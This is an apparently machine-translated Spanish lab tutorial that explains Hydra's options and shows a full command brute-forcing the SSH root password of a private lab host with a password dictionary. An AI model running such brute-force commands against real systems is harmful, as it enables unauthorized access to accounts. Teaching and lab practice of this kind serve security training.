Colección de citas famosas - Consulta de diccionarios - Uso original de Hydra para descifrar contraseñas de protocolos de red por fuerza bruta

Uso original de Hydra para descifrar contraseñas de protocolos de red por fuerza bruta

Hydra es una herramienta integral de descifrado de fuerza bruta con funciones potentes y compatible con casi todos los protocolos. Este experimento utiliza Hydra para descifrar la contraseña de inicio de sesión SSH;

Descripción del parámetro

hidra [[[-l login|-L file] [-p PASS|-P FILE]] | -C ARCHIVO]] [-e ns]

[-o ARCHIVO] [-t TAREAS] [-M ARCHIVO [-T TAREAS]] [-w tiempo] [-f] [-s PUERTO ] [-S] [-vV] servicio de servidor [OPT]

-R Continuar descifrando desde el último progreso.

-S utiliza enlace SSL.

-s PORT Puede utilizar este parámetro para especificar un puerto no predeterminado.

-l LOGIN especifica el usuario crackeado y crackea al usuario específico.

-L FILE especifica el diccionario del nombre de usuario.

-p PASS está en minúsculas, especifica el descifrado de contraseñas, rara vez se usa, generalmente usa un diccionario de contraseñas.

-P ARCHIVO mayúscula, especifica la contraseña del diccionario.

-e ns opción opcional, n: prueba de contraseña vacía, s: usa la prueba de usuario y contraseña especificada.

-C FILE utiliza un formato separado por dos puntos, como "nombre de inicio de sesión:contraseña" en lugar de los parámetros -L/-P.

-M FILE especifica el archivo de lista de objetivos una línea por línea.

-o FILE especifica el archivo de salida del resultado.

-f Después de usar el parámetro -M, deje de descifrar cuando encuentre el primer par de nombres de inicio de sesión o contraseñas.

-t TAREAS El número de subprocesos que se ejecutan simultáneamente, el valor predeterminado es 16.

-w TIME establece el tiempo de espera máximo en segundos. El valor predeterminado es 30 segundos.

-v / -V muestra el proceso detallado.

IP de destino del servidor

el servicio especifica el nombre del servicio, los servicios y protocolos admitidos: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt fs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere

teampeak sip vmauthd firebird ncp afp, etc.

Proceso experimental

Host víctima: 192.168.1.103

Usuario víctima: root

1. Necesitamos conocer el usuario ssh de el host de la víctima, como root. A continuación, necesitamos preparar un diccionario de contraseñas. Para ahorrar tiempo, utilizamos un diccionario de contraseñas simple, que contiene la contraseña correcta para root@192.168.1.103;

2. Ingrese: Hydra en la terminal. 192.168.1.103 ssh -l root -P ./Documents/password.txt -V y presione Enter;

Luego Hydra intentará uno por uno de acuerdo con el contenido del diccionario y mostrará los resultados de la explosión después. todos los intentos se completan.

Laboratorio del equipo de seguridad de redes Safesonic 21 de agosto de 2016